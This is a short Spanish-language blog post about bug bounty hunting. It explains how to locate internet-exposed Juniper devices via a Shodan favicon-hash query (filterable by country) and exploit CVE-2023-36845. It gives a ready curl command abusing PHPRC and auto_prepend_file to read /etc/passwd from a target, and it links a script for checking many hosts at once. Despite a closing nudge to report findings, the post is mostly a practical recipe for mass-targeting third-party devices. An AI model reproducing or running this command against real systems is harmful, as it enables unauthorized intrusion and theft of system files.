Como encontrar fácil una vulnerabilidad en bug bounty

Introducción

Hace poco leí un articulo en otro idioma que me fascino, que trata de comer encontrar vulnerabilidades fácil, bueno eso de fácil es relativo, pero aquí vamos.

Explotando Juniper Networks

Este investigador probaba solo una vulnerabilidad en específico de Juniper Networks, me refiero a CVE-2023–36845, esta vulnerabilidad es critica y lleva a un RCE, el santo grial que todos los investigadores buscamos. Aqui te dejo un link que explica como explotar esa vulnerabilidad https://vulncheck.com/blog/juniper-cve-2023-36845/

Para buscar esta vulnerabilidad se usa Shodan, puedes encontrar sistemas que corran Juniper networks con su favicon

http.favicon.hash:2141724739

También puedes filtrar por país u organización: http.favicon.hash:2141724739 country:co

En total hay mas de 15.000 dispositivos con esta tecnología, ten cuidado que también muchos pueden ser Honeypots….

Tambien puedes buscar mas http.favicon con esta guia https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv

Para explotar esta vulnerabilidad, puedes probar con este comando:

curl -kv «https://<target>/about.php?PHPRC=/dev/fd/0» –data-binary ‘auto_prepend_file=»/etc/passwd»‘

Automatizando la vulnerabilidad

Luego de encontrar varios posibles victima de Juniper Networks en Shodan procedemos a usar un script para verificar si realmente es vulnerable o no. https://github.com/Asbawy/Automation-for-Juniper-cve-2023-36845

Recuerda usar este conocimiento para hacer el bien, repórtalo y gana algo de dinero!

Scroll al inicio